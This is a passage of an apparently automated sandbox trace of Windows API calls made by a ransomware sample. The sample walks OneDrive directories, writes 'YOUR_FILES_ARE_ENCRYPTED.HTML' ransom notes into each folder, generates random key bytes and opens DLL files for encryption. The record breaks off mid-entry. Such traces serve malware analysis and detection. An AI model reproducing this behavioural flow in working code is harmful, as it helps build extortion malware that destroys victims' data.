returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ku-arab\\*" [0112.510] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ku-arab\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf25ac394, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf25ac394, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf5b19f9c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0112.511] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf25ac394, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf25ac394, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf5b19f9c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="..", cAlternateFileName="")) returned 1 [0112.511] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5b19f9c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf5b19f9c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf5d3009a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.511] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.511] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ku-arab\\FileSync.LocalizedResources.dll.mui") returned 119 [0112.511] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.511] lstrlenW (lpString=".mui") returned 4 [0112.511] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.511] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5b19f9c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf5b19f9c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf5d3009a, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.511] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0112.511] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ku-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0112.511] GetProcessHeap () returned 0x600000 [0112.511] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ku-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\ku-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.512] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.513] CloseHandle (hObject=0x330) returned 1 [0112.513] GetProcessHeap () returned 0x600000 [0112.513] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.513] GetProcessHeap () returned 0x600000 [0112.513] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.514] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf79de4ea, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf79de4ea, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf79de4ea, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ky", cAlternateFileName="")) returned 1 [0112.514] StrStrIW (lpFirst="ky", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.514] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ky") returned 78 [0112.514] GetProcessHeap () returned 0x600000 [0112.514] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.515] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ky" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ky") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ky" [0112.515] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ky", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ky\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ky\\*" [0112.515] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ky\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf79de4ea, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf79de4ea, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8282d8b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0112.516] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf79de4ea, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf79de4ea, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8282d8b, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="..", cAlternateFileName="")) returned 1 [0112.516] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8282d8b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8282d8b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8878a7e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.516] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.516] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ky\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.516] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.516] lstrlenW (lpString=".mui") returned 4 [0112.516] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.516] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8282d8b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8282d8b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8878a7e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.516] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0112.516] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ky\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.516] GetProcessHeap () returned 0x600000 [0112.516] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ky\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\ky\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.517] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.518] CloseHandle (hObject=0x330) returned 1 [0112.518] GetProcessHeap () returned 0x600000 [0112.518] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.518] GetProcessHeap () returned 0x600000 [0112.518] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.519] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf89aa04e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf89aa04e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf89aa04e, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="lb-lu", cAlternateFileName="")) returned 1 [0112.519] StrStrIW (lpFirst="lb-lu", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.519] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lb-lu") returned 81 [0112.519] GetProcessHeap () returned 0x600000 [0112.519] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.520] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lb-lu" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lb-lu") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lb-lu" [0112.520] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lb-lu", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lb-lu\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lb-lu\\*" [0112.520] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lb-lu\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf89aa04e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf89aa04e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf90f72a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName=".", cAlternateFileName="")) returned 0x626778 [0112.521] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf89aa04e, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf89aa04e, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf90f72a6, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="..", cAlternateFileName="")) returned 1 [0112.521] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf90f72a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf90f72a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf9608373, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.521] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.521] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lb-lu\\FileSync.LocalizedResources.dll.mui") returned 117 [0112.521] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.521] lstrlenW (lpString=".mui") returned 4 [0112.521] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.521] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf90f72a6, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf90f72a6, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf9608373, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x174c0, dwReserved0=0x19e010, dwReserved1=0xfc42be55, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.521] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0112.521] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lb-lu\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0112.521] GetProcessHeap () returned 0x600000 [0112.521] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d020 [0112.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lb-lu\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\lb-lu\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0112.522] WriteFile (in: hFile=0x330, lpBuffer=0x315d020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d020*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.523] CloseHandle (hObject=0x330) returned 1 [0112.523] GetProcessHeap () returned 0x600000 [0112.523] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d020 | out: hHeap=0x600000) returned 1 [0112.523] GetProcessHeap () returned 0x600000 [0112.523] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.524] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32eeba5, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x32eeba5, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x4889ef2, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x1a8c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="LoggingPlatform.dll", cAlternateFileName="LOGGIN~1.DLL")) returned 1 [0112.524] StrStrIW (lpFirst="LoggingPlatform.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.524] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\LoggingPlatform.dll") returned 95 [0112.524] PathFindExtensionW (pszPath="LoggingPlatform.dll") returned=".dll" [0112.524] lstrlenW (lpString=".dll") returned 4 [0112.524] PathFindExtensionW (pszPath="LoggingPlatform.dll") returned=".dll" [0112.524] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0112.524] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\LoggingPlatform.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_2\\loggingplatform.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0112.525] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=108736) returned 1 [0112.525] GetProcessHeap () returned 0x600000 [0112.525] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0112.528] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="EE") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="27") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="86") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="DB") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="C9") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="46") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="42") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="74") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="1F") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="28") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="AB") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="2C") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="B0") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="C5") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="CD") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="4B") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="89") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="08") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="96") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="45") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="76") returned 2 [0112.528] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="04") returned 2 [0112.528] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="3C") returned 2 [0112.528] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="F7") returned 2 [0112.528] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="3A") returned 2 [0112.528] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="84") returned 2 [0112.528] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="0F") returned 2 [0112.528] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="B4") returned 2 [0112.528] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="F7") returned 2 [0112.529] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="D7") returned 2 [0112.529] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="3C") returned 2 [0112.529] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="22") returned 2 [0112.529] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\LoggingPlatform.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\LoggingPlatform.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\LoggingPlatform.dll" [0112.529] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0112.529] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0112.529] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9739439, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf9739439, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf9739439, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="lt", cAlternateFileName="")) returned 1 [0112.529] StrStrIW (lpFirst="lt", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.529] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lt") returned 78 [0112.529] GetProcessHeap () returned 0x600000 [0112.529] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30a0048 [0112.531] lstrcpyW (in: lpString1=0x30a0048, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lt" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lt") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lt" [0112.531] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lt", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lt\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lt\\*" [0112.531] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\lt\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9739439, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf9739439, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xfa977fad, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x27aa09b, cFileName=".", cAlternateFileName="")) returned 0x626778 [0112.531] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9739439, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf9739439, 